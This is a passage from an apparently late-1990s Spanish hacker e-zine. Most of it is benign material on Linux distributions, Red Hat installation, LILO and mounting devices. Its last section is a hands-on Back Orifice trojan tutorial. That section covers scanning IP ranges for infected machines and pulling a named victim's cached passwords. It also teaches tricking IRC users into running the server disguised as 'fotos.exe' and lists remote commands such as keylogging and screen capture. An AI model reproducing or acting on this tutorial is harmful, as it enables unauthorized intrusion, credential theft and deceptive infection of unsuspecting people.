Su precio esta alrededor de los 5 dolares.
- Sitio Web: http://www.debian.org
OpenLinux
---------
La empresa de esta distribucion se llama Caldera System, esta dirigida a usuarios corporativos.
Incluye varios programas como, Netscape, StarOffice, Word Perfect, Apache.
Es una distribucion facil de instalar.
- Precio: Alrededor de los 50 dolares.
- Sitio Web: http://www.calderasystems.com
Linux Mandrake
--------------
Se basa en Red Hat, la empresa de esta distribucion se llama MandrakeSoft y la adapto para que
que fuera mas facil de usar. Incluye varios entornos graficos como KDE, Gnome, AfterStep, IceWM.
- Precio: Alrededor de 10 y 50 dolares.
- Sitio Web: http://www.linux-mandrake.com/es
Conectiva Linux
---------------
Es una distribucion de origen Brasileno, basada en Red Hat, el paquete incluye 650 aplicaciones
adicionales.
- Precio: Alrededor de los 70 dolares.
- Sitio Web: http://www.conectiva.com/es
DISTRIBUCION SLACKWARE
----------------------
Esta distribucion es de las primeras que empezo. Ha tenido un periodo en el cual no se ha
actualizado muy a menudo, aunque parece que ha vuelto con fuerza.
Slackware 7.0 Released!
- Precio: $39.95.
http://www.slackware.com/
-*-**-*--*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-**-*-*-*-*-*-*--*-
Sitos Web LINUX
===============
Linux.org
---------
El sitio Oficial de Linux. Incluye Toda la informacion que se pueda buscar sobre Linux, incluye
tutoriales, articulos, noticias.
- Sitio Web: http://www.linux.org
LinuxStart
----------
Es el portal mas conocido sobre Linux. Incluye informacion de todo tipo, como para principiantes
hasta expertos.
Tiene versiones del sitio en 8 idiomas.
Se pueden ver Noticias, Faqs, trucos y muchas otras cosas...
- Sitio Web: http://es.linuxstart.com
Linuxjournal
-------------
Contiene Noticias frescas, para ayudar a la comuidad Linuxera a mantenerse al tanto de todo lo
que pasa con el Sistema Operativo, cambios de Kernel, ultimas aplicaciones, etc...
- Sitio Web: http://www.linuxjournal.com
Linux Internacional
--------------------
El sitio de una asociacion de grupos sin animo de lucro, que ayudan a la expansion de Linux,
(que ya esta bastante expandido), ellos la definen como "La Revolucion Linux".
- Sitio Web: http://www.li.org
Proyecto LuCAS
--------------
La mayor biblioteca en español dedicada a GNU/LiNUX de todo el planeta.
- Sitio Web: http://www.infor.es/LuCAS
SoloLinux
----------
Sitio especializado en Noticias. Estan clasificadas por dias...
- Sitio Web: http://www.sololinux.com
ZonaLinux
---------
Sitio Espanol. Encontrara bastante documentacion, como consejos para instalacion y configuracion
Noticias, distribuciones, enlaces, etc...
- Sitio Web: http://www.zonalinux.com
APOSTOLS
--------
Magnifica página sobre Linux.
- Sitio Web: http://linux.apostols.org/
Gran cantidad de información y software.
~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~
- Sitio Web: http://linux.box.sk/
Gestor de escritorio KDE.
~=~=~=~=~=~=~=~=~=~
- Sitio Web: http://www.kde.org/
EMPRESAS IMPORTANTES QUE SE HAN SUMADO A LINUX
~!~!~!~!~!~!~!~!~!~!~!~!~!~!~!~!~!~!~!~!~!~!~!
Debido al éxito de Linux, respaldado por su funcionalidad y disponibilidad en todo el mundo,
las empresas mas importantes de software han lanzado versiones de sus productos para Linux,
así, por ejemplo, tenemos a Oracle, Informix, Corel, Netscape, IBM, HP, etc. También las
empresas de hardware, estan lanzando equipos preconfigurados con Linux y prestan soporte
linux para sus maquinas, como Compaq, Dell, IBM, SUN, HP, etc.
Lo que asegura un futuro prometedor.
INSTALACION DE LINUX EN PC.
!~!~!~!~!~!~!~!~!~!~!~!~!~!
Métodos de instalacion
Según su eleccian del método de instalacion necesitara de uno o dos disquettes de 3.5"HD.
Si esta instalando desde CD-ROM o por NFS (Network File System) entonces necesitara solo
del disco de arranque. La instalacian desde disco duro, un servidor FTP o un dispositivo
PCMCIA requiere el uso del diso adicional también.
CD-ROM
Si usted tiene un CD de Red Hat Linux y un disco de arranque entonces necesitara un
drive para disquettes de 3.5" HD o una instalacian de DOS en su maquina, así como un
drive de CD-ROM soportado, para correr el programa de instalacian. Si usted no tiene
disco de arranque entonces necesitara tener acceso a una computadora corriendo Linux
o DOS para crear el disco de arranque desde CD-ROM.
NFS
Si usted desea instalar a través de una red, necesitara montar el CD-ROM de Red Hat
Linux en una maquina que soporte el sistema de archivos ISO-9660 con extensiones de
Rock Ridge. Dicha maquina también debera soportar NFS. Tiene que exportar el sistema
de archivos del CD-ROM por NFS. Necesitara tener configurado el servidor de nombres
o conocer la direccian IP del servidor NFS, así como la ruta del CD-ROM exportado.
FTP
Para la instalacian por FTP, debe tener el disco de arranque y el disco adicional.
Necesita tener configurado un servidor de nombres o conocer la IP del servidor FTP
que utilizara. También necesitara la ruta del directorio principal de Red Hat en el
sitio FTP.
Disco Duro
Para instalar Red Hat desde disco duro necesitara los mismos disco de arranque y adicional
que utiliza la instalacian por FTP. Debe crear un directorio RedHat en el primer nivel
del arbol de directorios. Todo lo que va a instalar debera quedar en este subdirectorio.
Primero copie el directorio base y luego copie los paquetes que desea instalar a otro
subdirectorio llamado RPMS. Puede utilizar espacio disponible en una partician de DOS
o Linux que no sea requerido por el proceso de instalacian (por ejemplo, una partician
que sería utilizada para almacenamiento de datos en el sistema instalado).
Si esta utilizando un sistema de archivos de DOS no podra utilizar los nombres largos
de archivos de Linux para los paquetes rpm. La utiliería RPM no tiene problemas con los
nombres de los archivos, pero es buena idea que usted los recuerde para que sepa qué es
lo que esta instalando.
Creando los discos de arranque y adicional
~!~!~!~!~!~!~!~!~!~!~!~!~!~!~!~!~!~!~!~!~!
Su distribucian puede incluir disco de arranque y adicional. Si no es así, lo primero que
tiene que hacer es crear el disco de arranque, que utilizara durante la instalacian.
También necesitara un disco adicional sino esta instalando desde CD-ROM o NFS. Estos deben
ser diquettes de 3.5" HD. Las imagenes de disco para estos disquettes estan bajo el
directorio images del CD-ROM o del directorio de donde baja la distribucian por FTP. Si usted
tiene DOS instalado en su computadora, puede arrancar la utilería de instalacian desde el
CD-ROM con el comando:
\dosutils\autoboot
Tome en cuenta que a la hora de la instalacian hay ciertos límites acerca de los sistemas de
archivos que soporta el kernel. Sin embargo, después de la instalacian hay soporte para todos
los sistemas de archivos disponibles bajo Linux. Durante la instalacian el kernel modularizado
tiene soporte para dispositivos (E)IDE (incluyendo CD-ROMs ATAPI), adaptadores SCSI y tarjetas
de red. También todos los dispositivos de mouse, SLIP, CSLIP, PPP, PLIP, emulacian de FPU,
eleccian de consolas, ELF, SysV IPC, IP forwarding, firewalling y accounting, ARP inverso,
cintas QIC e impresoras paralelas, son soportados.
Creando los discos bajo DOS
!~!~!~!~!~!~!~!~!~!~!~!~!~!
Si esta creando los discos bajo DOS entonces puede utilizar el programa rawrite que viene
incluido en el CD de Red Hat Linux. Primero que nada, llamele boot a un disco de 1.44 MB
de 3.5". después tiene que ejecutar el siguiente comando (asumiendo que su drive de CD-ROM
es d:):
d:\dosutils\rawrite
Rawrite le preguntara por un nombre de archivo. Escriba \images\boot.img. Entonces le
preguntara por un disco, el cual tiene que ser a:. Si necesita crear el disco adicional
entonces ponga el nombre supplemental a otro disco de 1.44 MB de 3.5" y ejecute rawrite
de nuevo. Cuando éste le pergunte por el nombre de archivo, escriba \images\supp.img.
De nuevo, escriba a: en el nombre del archivo del disco y continue como fue descrito arriba.
Ahora debera tener dos discos llamados boot y supplemental.
Arrancando la instalacian.
!~!~!~!~!~!~!~!~!~!~!~!~!~!
Inserte el disco de arranque (boot) que acaba en el drive de disquettes y reinicie la maquina.
El sistema utilizara la imagen en el disquette para arrancar. Al principio vera la línea de
comando LILO:. Para la primera vez, nada mas presione ENTER. Observe los mensajes mientras
el kernel de Linux inicializa su hardware. Si falta algo o se equivoca, es posible que usted
necesite proporcionar ciertos parametros en el LILO: si realmente necesita especificar
parametros, anatelos. Los va a necesitar después.
Después de escribir cualesquiera parametros sean necesarios, presione ENTER para comenzar
el proceso de instalacian.
Luego aparece nuevamente la ventana de bienvenida a la instalacion de linux, donde se nos
informa sobre el producto. Pulsamos OK.
CHOOSE LANGUAGE: Este es el idioma con el que nos guiaremos durante el proceso de
instalacion de linux, cual dispone de 8 idiomas. Elija el idioma de su gusto y luego
pulse F12.
KEYBOARD TYPE: Que tipo de teclado tenemos, esto es para instalar la configuracion
debida para la distribucion de las teclas. Por defecto usaremos US y luego debemos
pulsar F12.
INSTALLATION METHOD: Debemos indicar la ubicacion del paquete a instalar, o sea,
desde que lugar vamos a utilizar los archivos para proceder a instalar linux.
Hay cinco (5) tipos: CDROM, NFS Image, Hard Disk Drive, FTP site, SMB Image.
En nuestro caso debemos elegir CDROM y seguido pulsar F12.
Se le pedira insertar el CD con el paquete instalador y pulsar F12 como siempre.
El programa procede a leer y detectar el CDROM, se recomienda esperar.
INSTALLATION PATH: nos preguntara que tipo de instalacion vamos a realizar, tenemos
dos (2) opciones: INSTALL - UPGRADE. En nuestro caso debemos elegir INSTALL y pulsar F12.
SCSI CONFIGURATION: Pregunta si tenemos conexion o adaptadores SCSI. La respuesta
dependera de si tenemos o no. En mi caso elegi NO. (F12).
DISK SETUP: Entramos a la seccion donde debemos particionar el disco y crear las
divisiones en el. Para esto el programa nos muestra dos programas que podemos usar para
esto. DISK DRUID y FDISK. El programa recomienda a FDISK, porque ha sido la herramienta
usada por todos para particionar discos LINUX. Se recomienda DISK DRUID. (F12)
Ahora veremos la estructura del disco, sus particiones y tipo (FAT, FAT32, NTFS, etc)
y donde recomendamos hacer lo siguiente:
Eliminar la 2da particion
Crear una particion SWAP, indicandole el doble de espacio que tiene de RAM. La
partician SWAP es una partician donde Linux acudira cuando se le agote la memoria real,
algo así como la memoria virtual de windows 95. Si tu computador tiene mucha memoria no
es necesaria una partician SWAP. Podriamos poner un tope de 40 megas para arriba para no
necesitar SWAP. Si crees que vas a necesitarla con una partician de unos 30 MB sobrara,
aunque cuanta mas pongas mejor, todo depende de la cantidad de memoria real que tengas.
Crear una particion LINUX ocupando un espacio minimo de 200 MB.
Salvamos la configuracion (F12).
Ahora el programa procedera a formatar el FAT SWAP. Debemos esperar.
PARTITIONS TO FORMAT: Cual es la particion que nosotros queremos formatear. Se
recomienda formatear toda la particion del sistema. Se debe elegir la particion donde
estaran los archivos del sistema. En este punto si antes tenias instalado Linux y lo
que vas hacer es algun upgrade, entonces, elijes solo la particion "/" para formatear
o si deseas formatear todas, entonces las seleccionas todas y continuas con la
instalacion pulsando F12.
COMPONENTS TO INSTALL: Debemos elegir todos los servicios que queremos instalar en
este proceso. Una vez hallamos elegido los servicios que deseamos pulsamos F12.
INSTALL LOG: Aqui el programa nos informa de la ubicacion del archivo historial de
instalacion (INSTALL.LOG), el cual se creara durante el proceso de instalacion de
LINUX. Es recomendable mantener este archivo para una futura referencia. Su
ubicacion sera /tmp/install.log. (F12)
procedemos a crear el FILE SYSTEM EXT2, el cual es el disco donde se instalara linux.
Se recomienda elegir dependiendo de los sistemas que se tengan instalado en tu equipo.
Una vez se halla elegido el disco, pulsamos F12 para continuar.
INSTALL STATUS: El proceso de instalacion de los programas se inicia, presentando dos
barras de estados, la primera es donde se presenta el programa que se esta instalando
y la segunda, el proceso de instalacion a nivel general. Este proceso, debe de tardarse,
entre 1-2 horas, asi que esperen el tiempo que se necesite.
PROBING RESULT: Es un chequeo rutinario para tratar de detectar el mouse que haya
instalado en el equipo.
CONFIGURE MOUSE: Si ha detectado un Mouse, procedemos a elegir el tipo de mouse.
Por defecto se recomienda elegir Microsoft Compatible (Serial). La eleccion del mouse
en este paso dependera de si tiene 2 o 3 botones, puedes emular si deseas. (F12)
MOUSE PORT: En que puerto esta instalado el Mouse. Normalmente el COM1, asi que
busque el puerto compatible con LINUX, que reconoce los puertos de COM como
CUA[0-3].(F12)
CHOOSE CARD: Tipo de tarjeta de video instalado en tu Computador. Se recomienda
el Generic VGA complatible, pero antes debe estar seguro de que tipo de tarjeta
de video tiene instalada en su PC, puede hacer una busqueda en la lista.(F12)
Procedemos a instalar el controlador. Esperar...
MONITOR SETUP: Tipo de monitor que tenemos, Recomendamos Custom Monitor. (F12)
SCREEN CONFIGURATION: Es una prueba para detectar la resolucion de colores del monitor.
En este caso tenemos dos opciones: DON'T PROBE y PROBE. Recomendamos PROBE. (F12)
PROBING TO BEGIN: Procedemos a obtener la informacion del monitor. (F12)
NETWORK CONFIGURATION: Si tenemos instalada o queremos instalar una red LAN en el
sistema debemos proceder a configurar. Se recomienda elegir NO si no desea estar
en una red LAN, pero en este caso, deseamos una red LAN, por lo que la respuesta
deberia ser SI. (F12)
TIMEZONES: Formato tipo del tiempo almacenado. JAMAICA. (F12)
SERVICES: Cuales servicios queremos iniciar automaticamente se carga linux. Se
recomienda iniciarlos todos. (F12)
CONFIGURE PRINTER: Si deseamos configurar una impresora que tenemos instalada,
debemos elegir la opcion que mas nos convenga. (F12)
PRINTER CONNECTION: La forma de como esta conectado el printer. LOCAL (F12)
STANDARD PRINTER OPTIONS: Nombre del archivo que manejara la cola de impresion.
Por defecto, lp (F12)
DEVICE PRINTER LOCAL: Puerto por donde esta instalado la impresora. LPT1 (F12)
PRINTER TYPE: Tipo o nombre de la impresora
VERIFY PRINTER CONFIGURATION: Informacion sobre la impresora. (F12)
ROOT PASSWORD: Se les pide elegir el password para el administrador de la red.
No se puede olvidar este password. (F12)
BOOTDISK: Proveedor de buteo personalizado. Un disquette a utilizar que usaremos
para butear el sistema en caso de que este falle. Se recomienda YES y crearlo. (F12)
LILO INSTALLATION: Donde deseamos instalar el BOOTLOADER. Se recomienda en el
Master Boot Record (MBR) /dev/hda. (F12)
LILO INSTALLATION: Si queremos poner un password de buteo. Se recomienda dejar
en blanco. (F12)
Ahora procede a crear la parte del RAM, buteo.
Que es LILO?
Lilo (LInux LOader) es el programa que nos permitira elegir entre usar Linux u otro sistema
operativo al arrancar nuestro computador. La mayoria de las distribuciones al finalizar la
instalacian del paquete proceden a configurar una serie de apartados importantes de nuestro
sistema, como la red, impresoras o arranque del sistema.
Configurar todo esto no es esencial para el buen funcionamiento de nuestro sistema y todo
se puede configurar una vez va con Linux. Lo único indispensable es el arranque del sistema.
Antes de instalar LILO debes tener en cuenta que este solo se instala en discos duros con
menos de 1024 cilindros. Con la mayoría de los discos nuevos no es posible su instalacian a
menos que se haga una partician antes del cilindro 1024 y se instale ahi el lilo, nunca en
el MBR (Master Boot Record). Si tu disco duro tiene menos de 1024 cilindros no tendras ningún
problema y podras instalar LILO en el MBR.
Tambien tenemos la opcian de instalacian en un disquette, por lo que tendremos que arrancar
Linux desde el disco. Antes de la instalacian de LILO se nos pedira que le especifiquemos
las entradas a los distintos sistemas operativos que tengamos en el computador.
Especificarlos es tarea facil, es basicamente introducir la etiqueta que sería linux para
el Linux, dos para el DOS, etc (se pude poner la etiqueta que se desee), y poner en el
apartado donde lo pida la partician donde va cada etiqueta (debemos tener claro cual es cual
y no liarnos con las nuevas especificaciones de /dev/hdXX).
Despues de estos se instala el LILO y queda todo listo para arrancar nuestro sistema.
Una vez instalado el LILO el sistema se reciniciara y podremos arrancar el sistema ya con
Linux.
En caso de que esto no suceda, abrimos el archivo /etc/lilo.conf y la anadimos la entrada
del otro sistema operativo que tengamos y resintalamos el LILO poniendo lilo en el prompt.
Para mas informacian sobre el LILO escibirmos en el prompt de Linux man lilo.
Montar LILO
~!~!~!~!~!~!
desde dos (o sea, F8 -> Solo simbolo de Sistema)
loadlin.exe vmlinuz root=/dev/hdXX
cuando estes en linux colocas "lilo"
Consolas virtuales
~!~!~!~!~!~!~!~!~!~
La consola del sistema es el monitor y teclado conectado directamente al sistema.
(Como UNIX es un sistema operativo multiusuario, puede tener otros terminales conectados
a puertos serie del sistema, pero estos no seran la consola). Linux, como otras versiones
de UNIX, porporciona acceso a consolas virtuales (o VC's), las cuales le permitiran tener
mas de una sesian de trabajo activa desde la consola a la vez.
Para demostrar esto, entre en su sistema (como hemos visto antes). Ahora pulse alt-F2.
Debería ver la pregunta login: de nuevo. Esta viendo la segunda consola virtual ha entrado
en el sistema por la primera. Para volver a la primera VC, pulse alt-F1.
Un sistema Linux recien instalado probablemente le permita acceder a las primeras cuatro
VC's, usando alt-F1 - alt-F4. Pero es posible habilitar hasta 12 VC's una por cada tecla
de funcian del teclado. Como puede ver, el uso de VC's es muy potente puede estar trabajando
en diferentes VC's a la vez.
Mientras que el uso de VC's es algo limitado (despues de todo, solo puede mirar un VC cada vez),
esto debería darle una idea de las capacidades multiusuario del sistema. Mientras esta
trabajando en el VC #1, puede conmutar al VC #2 y comenzar a trabajar en otra cosa.
Montar dispositivos con LINUX
~!~!~!~!~!~!~!~!~!~!~!~!~!~!~!
Antes de montar un dispositivo si es desde el Shell del computador, es recomendable
ejecutarlo como superusuario (root). Antes de montar un dispositivo debe revisar que este
se encuentre disponible en su sistema, para eso existen diferentes formas. Todos los
dispositivos (devices) se encuentran en /dev.
Los principales dispositivos que puedes encontrar en /dev son:
/dev/hda[1-16] : 1er disco duro IDE (primario master)
/dev/hbd[1-16] : 2do disco duro IDE (secundario master)
/dev/sda[1-16] : 1er disco duro SCSI (primario master)
/dev/sdb[1-16] : 1er disco duro SCSI (secundario master)
/dev/fd0H720 : 1era disquetera de 720 KB
/dev/fd0H1440 : 1era disquetera de 1.44 MB
/dev/cdrom : unidad de cdrom.
/dev/cua[0-3] : puertos COMM.
/dev/lp[0-2] : Puertos de LPT.
1. Montar unidades
~=~=~=~=~=~=~=~
En Unix, todos los archivos se encuentran en el arbol de directorios, que parte de "/".
Los dispositivos para ser accedidos deben ser asociados con ficheros. Para esto sirve el
comando mount.
La forma de usar mount es esta:
mount -t tipo dispositivo directorio
Donde tipo indica el sistema de ficheros del dispositivo, dispositivo indica el dispositivo
que se quiere montar, y directorio especifice el directorio en el que debe ser montado
(debe existir previamente).
Parametros mas importantes a usar:
-r : monta el sistema de ficheros como de solo lectura
-w : monta el sistema de ficheros para lectura y escritura ( por defecto ).
-t : indica el tipo de sistema de ficheros a montar. Soporta entre otros:
ext2 : el nativo de Linux
msdos : para el sistema operativo MS-DOS
vfat : para Windows 95/98
iso9660 : para dispositovos CD-ROM (por defecto)
otros : mirar la pagina de manual ( man mount ).
Si no se especifica la opcian -t , se prueban de entre la lista anterior ext2 e iso9660.
Por ejemplo, para montar el CD-ROM podríamos hacerlo de esta forma:
mount -r /dev/cdrom /mnt/cdrom
y para montar una partician de Windows95 de esta:
mount -t vfat /dev/hda3 /mnt/windows
Suponiendo que la partician de Windows95 se encuentre en el disco maestro de la primera
controladora IDE (hda), tercera partician (3).
2. El archivo /etc/fstab
~=~=~=~=~=~=~=~=~=~=~
Cuando se monta un fichero especificado en /etc/fstab , es suficiente con indicar el nombre
del dispositivo o el punto de montaje.
Formato del fichero /etc/fstab
dispositivo punto_de_montaje sistema_de_ficheros opciones_mnt fs_freq fs_passno
Donde:
dispositivo: el dispositivo que se quiere montar. (p.e. /dev/cdrom )
punto_de_montaje: Lugar en el arbol de directorios donde se quiere montar (p.e. /mnt/cdrom )
sistema_de_ficheros: Sistema de ficheros del dispositivo ( p.e. iso9660 )
opciones_mnt: Opciones para montar el sistema de ficheros. Las mas importantes:
ro : monta el sistema de ficheros en solo lectura (por defecto lectura/escritura)
user : Habilita a cualquier usuario corriente y moliente a montar el dispositivo
noauto : salo puede ser montado explícitamente.
fs_freq : usado por el comando dump para determinar que sistemas de ficheros
deben ser "dumped".
fs_passno : es usado por el programa fsck para determinar en que orden deben ser
chequeados los sistemas de ficheros al arrancar la maquina. Si no esta presente
o es cero, fsck asume que el sistema de ficheros no debe ser chequeado.
Ejemplo:
/dev/hda1 / ext2 defaults 0 1
/proc /proc proc defaults 0 0
/dev/hda2 none swap defaults 0 0
#
/dev/fd0 /mnt/floppy ext2 defaults,noauto 0 0
#
/dev/hdc /mnt/cdrom iso9660 ro,user,noauto 0 0
3. Desmontar las unidades
~=~=~=~=~=~=~=~~=~=~=~=~
Esta tarea se realiza medianta el comando umount . La forma de usarlo es:
umount dispositivo
umount directorio_de_montaje
Cuando terminamos de usar un dispositivo hay que "desmontarlo". No podemos cambiar un
diquete o un CD-ROM sin antes "desmontarlo".
por ejemplo:
umount /dev/cdrom
Es importante salir del directorio de montaje antes de "desmontar" el dispositivo, si no
nos dira que el dispositivo esta ocupado (busy).
Montar una unidad de ZIP en Linux
Antes de poder usar una unidad de zip con nuestro sistema operativo linux, debemos
asegurarnos de que el kernel gestiona el modulo "ppa" y esto lo podemos comprobar con el
comando "modprobe" (como root):
# modprobe ppa
de esa manera se sabra o uno si existe, en caso de que no exista, hay que recompilar el
kernel con el habilitado. Para el funcionamiento de la ZIP, basta con instalar el modulo
ejecutandor el comando "insmod ppa":
# insmode ppa
crear un directorio donde se montara el contenido de la cinta o disquette que se insertara
en la unidad ZIP.
# mkdir /mnt/zip
ejecutar el comando mount para habilitar la unidad ZIP en nuestro sistema. Por defecto la
unidad ZIP es reconocido como el device "sda4":
# mount -t [vfat msdos] /dev/sda4 /mnt/zip
Para desmontarla se ejecuta:
# umount /dev/sda4 o # umount /mnt/zip
Listo!!!
Hasta aqui el final de este artikulo, quedaron muchas cosas por ver, pero ya
sera para una tercera entrega.
Esperamos que les haya gustado :)))))
Y Rekuerda:
Microsoft te da las ventanas (Windows). LINUX te da la Casa completa.
je je je
~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^
kSh kSh kSh kSh kSh kSh kSh
~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^
~^~^~^~^~^~^~^~^~^~^~^~
Back Orifice
~^~^~^~^~^~^~^~^~^~^~^~
~^~^~^~^~^~^~^~^~^~^~^~
Pues como habia prometido aqui esta la segunda parte de este articulo,
tratare de explicar de forma clara y concisa el uso del BO, de una
forma practica y las posibles aplicaciones que se le pueden dar en IRC.
Una pequena parte del texto consiste en la recopilacion/traduccion del
trabajo de otros.
<<<<<¨Donde puedo conseguir el Bo?>>>>>
BO se puede conseguir en las siguientes direcciones:
http://www.cultdeadcow.com/ (pagina oficial)
http://www.vanhackez.com/
www.members.xoom.com/lynx/ en la zona de download (descarga).
<<<<<¨Ya tengo el Bo.zip, ¨Que contiene?>>>>>
El bo.zip o bo120.zip consta de una serie de archivos:
bo.txt Oscuro documento explicativo. No se entiende mucho.
plugin.txt Traducido en el epigrafe Apendice de este doc.
boserve.exe El servidor autoinstalable del BO
bogui.exe Cliente Grafico gui del BO
boclient.exe Cliente en modo texto del BO (funciona bajo Ms-dos)
boconfig.exe Utilidad de configuracian y plugin del server de BO
melt.exe Descompresor de archivos comprimidos con el comando freeze
freeze.exe Compresor de archivos. SE pueden descomprimir con melt.
<<<<<¨Que hacer con todos estos archivos?>>>>>
Para que todo funcione correctamente debes saber que BAJO NINGUN
CONCEPTO debes ejecutar boserve.exe, pues te haría sensible al ataque.
Ahora bien, si eres una de esas mentes inquietas, por que no ejecutarlo?.
Asi pones en practica de una vez como eliminarlo. Recuerda que somos
Esclavos del Conocimiento :)
Ademas entender como trabajan los troyanos es el primer paso para
protegernos de ellos.
Antes de empezar
~~~~~~~~~~~~~~~~
Te recomiendo el Nobo ya que cuando estas utilizando el BackOrifice estas
infectado temporalmente si asi podemos llamarle. Puedes encontrarlo en la
primera entrega de este magazine. Asi como en la seccion de archivos de la
pagina.
MANEJO EN AMBIENTE GRAFICO
~~~~~~~~~~~~~~~~~~~~~~~~~~
Para comenzar, un doble click en bogui.exe, aparecera el BO en
ambiente grafico.
El siguiente paso sera averiguar la ip de la victima.
<<<<<¨Como lo hago?>>>>>
Hay varias formas:
1) En el IRC; creo que no necesita explicacion :)
2) En el ICQ. Un click en el boton ICQ, luego password security y listo!
3) Y porque no? con tu propia ip. Un click en el boton INICIO, luego ejecutar
y finalmente digitas winipcfg.
Una vez obtenidas las Ips, realizamos un barrido de Ips para saber cuales
personas estan infectadas con el troyano.
<<<<<¨Como lo hago?>>>>>
Bien facil, te lo explicare bien detallado para que entiendas.
tenemos una Ip Ej: 205.244.33.28
En el campo Host en vez de introducir la ip completa, solo tomamos tres
numeros despues de cada punto y le agregamos un asterisco Ej: 205.244.33.*
Una vez realizado iran saliendo una serie de mensajes que no es mas que las
ipS de las personas infectadas con el troyano.
Ej:
---------- Packet received from host 205.244.33.28 port 31337 ---------
!PONG!1.20!DEFAULT! (protegido)
------------------------- End of Data -------------------
---------- Packet received from host 205.244.33.217 port 31337 ---------
!PONG!1.20!DEFAULT! (protegido)
------------------------- End of Data -------------------
---------- Packet received from host 205.244.33.223 port 31337 ---------
!PONG!1.20!HUASCARF! (Sin proteccion)
------------------------- End of Data -------------------
Luego nuestra tarea sera saber o identificar las que estan o no protegidas.
Y no sera tarea dificil ya que existe una pequena diferencia si te fijas
en el ejemplo anterior. Y es la siguiente, todas dicen !PONG!1.20 DEFAULT
con excepcian de la ultima !PONG!1.20!HUASCARF!, el cual seria el nombre
de la makina de nuestra victima.
Una vez realizado esto metemos la ip de la victima (sin el asterisco, por
supuesto). Que en este caso es 205.244.33.223
Seleccionamos el comando System Password, que es el que en realidad nos
interesa y obtenemos lo siguiente:
** 7:System passwords packet sent (19 bytes) val1: '' val2: ''
---------- Packet received from host 205.244.33.223 port 31337 ---------
Password cached by system:
index:01(06) len:60(43/82)
Resource: '*Rna\OOBE Registration\oobeosr1@reg.msn.com' Password: 'register'
index:00(06) len:36(20/72)
Resource: '*Rna\Codetel\huascar.f' Password: 'ilmcmd1(·1@reg.msn.comregister'
End of cached passwords.
Unable to read value 'ScreenSave_Data'
Nota: El BO saca los todos los passwords del cache de la makina, incluyendo
el Screen Saver (protector de pantalla) siendo el ultimo password obtenido el
que esta utilizando la victima actualmente, ademas cabe mencionar que puede
arrastrar consigo basura (caracteres ascii).
<<<<<¨Entonces, cual es el password?>>>>>
Username: huascar.f
Password: ilmcd1
Otro paso seria meterle como sea el archivo boserve.exe y conseguir
que lo ejecute.
Aqui entra en juego la imaginacion de cada uno. El campo ideal de accion es
el IRC. Aqui los pobres chateros de a pie hablan a sus anchas, desconocedores
del peligro que les acecha.
<<<<<¨Como le meto el BO al chico carabelita?>>>>>
Hay que elegir una victima que trabaje bajo windows. Todos sabemos que
eso es facil de averiguar en IRC.
Truco facil y muy visto, por tanto poco efectivo: renombrar boserve.exe
a fotos.exe. Si ya tienes algo de confianza con la victima en cuestion
lo aceptara sin mayores problemas. Para gente mas desconfiada, intenta
colarselo despues de hacerte tu el desconfiado:
Cuando el chico carabelita ejecute fotos.exe y vea que no aparece nada por
ningun lado, lo mas seguro es que te pregunte porque no funciona, y con
razon. Te disculpas y le dices que el archivo esta defectuoso y que
te lo vas a volver a bajar. Lo que te apetezca, pero queda bien con el,
para que no se corra la voz y sigan confiando en ti y en tus fotos >;->.
Es conveniente hacerselo a varios a la vez en privado, para tener un buen
numero de victimas. Con la excusa de volvertelo a bajar, te sales de Irc.
Vuelves a entrar con otro nick y a trabajar.
MODO MS-DOS
~~~~~~~~~~~
Bien una vez dominado Bo en ambiente grafico, vamos a trabajar MODO MS-DOS
con el boclient.exe, claro esta :)
<<<<<¨Como accedo al ordenador del chico carabelita?>>>>>
Pasos a seguir:
a) Copiar boclient.exe en tu directorio raiz, c:\
b) Abrir una ventana de msdos en w95
c) Resolver la ip de la victima. Facil de hacer en IRC. Si quieres le
das conversacion para que no se vaya.
d) En la ventana de msdos, desde la linea de comandos ejecutar
boclient.exe a continuacion teclea host "IPdelavictima", sin comillas.
e) En teoria ya estas dentro.
<<<<<¨Que puedo hacer una vez dentro?>>>>>
Puedes hacer maravillas. Pero por algo hay que empezar:
Desde bo tecleas dir. Te mostrara los archivos de su HD.
Si tecleas passes te saldran cosas interesantes, osea, algun0s
passwords.
Puedes teclear cd directorio para explorar. Como en MsDos.
Facil.
Cosas bonitas para "perfeccionistas"
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Puedes abrirle el puerto http y ver su disco duro camodamente con tu
navegador (A ver si soy capaz de hacerme entender):
Una vez dentro tienes que teclear httpon 80, o sea activar el http y el
puerto. Si por ejemplo tiene conectado el http con otra cosa, se lo
cierras primero con httpoff y el puerto que tenga abierto.
<<<<<¨como saber el puerto que tiene abierto?>>>>>
Facil, ¨un scaneado? Ejecutas el httpon y te dice el estado del http y
el puerto es decir, le cierras los puertos que tenga abiertos y luego le
abres el 80.
Mas comandos (traducido de la documentacion que acompana al BO):
Recuerda que en todo momento hablamos del cliente de texto, el
boclient.exe.
appadd Lanza una aplicacion de texto en un puerto tcp. Para controlar
una aplicacion dos o de texto (como el command.com) via telnet.
appdel evita que una aplicacion oiga las conexiones.
applist Da un listado de las aplicaciones que escuchan la conexion en
ese momento.
md Crea un directorio.
dir muestra los archivos y directorios.
rd Borra un directorio.
shareadd Crea un export en el servidor.
sharedel Borra un export.
copy Copia archivos.
del Borra archivos.
find Busca en el arbol los archivos.
freeze Comprime un archivo
melt Descomprime un archivo comprimido con freeze.
view Visor del contenido de un archivo.
httpoff Cierra el servidor http.
httpon Abre el servidor http.
keylog Logea las teclas que se aprietan en el servidor (victima) a un
archivo de texto. El log muestra el nombre de la ventana en que
se tecleo el texto.
keylog stopend Acaba el log de teclado.
capavi Captura video y audio de un dispositivo a un archivo .avi
capscreen Captura una imagen de la pantalla del server a formato .bmp
listcaps da un listado de los dispositivos de entrada de video.
sound ejecuta un archivo de sonido en el servidor (Te lo imaginas?).
netlist Listado de las conexiones de red.
netdisconnect Desconecta el servidor de una red.
netconnect Conecta el servidor a una red.
netview Ve todas las interfaces de red, servidores, dominios .
ping Hace ping al host. Da el nombre del host y la version del BO.
pluginexec Ejecuta un plugin para BO.
pluginkill Cierra el plugin.
